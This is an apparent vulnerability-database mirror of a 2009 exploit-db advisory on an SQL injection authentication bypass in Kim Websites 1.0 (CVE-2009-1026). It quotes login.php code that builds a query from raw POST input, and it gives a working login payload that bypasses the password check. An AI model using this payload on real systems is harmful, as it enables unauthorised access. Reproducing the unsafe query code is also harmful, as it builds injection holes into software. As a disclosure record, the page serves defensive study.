Lucene search
+L

Kim Websites 1.0 - Authentication Bypass

🗓️ 13 Mar 2009 00:00:00Reported by Virangar SecurityType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

Kim Websites 1.0 SQL Injection Vulnerability, Authentication Bypas

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-1026
13 Mar 200900:00
circl
cve
CVE
CVE-2009-1026
20 Mar 200900:00
cve
cvelist
Cvelist
CVE-2009-1026
20 Mar 200900:00
cvelist
euvd
EUVD
EUVD-2009-1027
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-1026
20 Mar 200900:30
nvd
prion
Prion
Sql injection
20 Mar 200900:30
prion

    	     ###############################################################
             #                                                             #
             #     Kim Websites 1.0 SQL Injection Vulnerability            #
             #                [ Authentication bypass]              	   #
             ###############################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By : Virangar Security Team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & Aria_security team & all  hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----------------------------------
vuln code in login.php:
$username = $_POST['username'];
$password = md5($_POST['password']);
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";
 -----------------------
Exploit:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
Y0ung Ir4ni4n H4ck3rz

# milw0rm.com [2009-03-13]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00993
36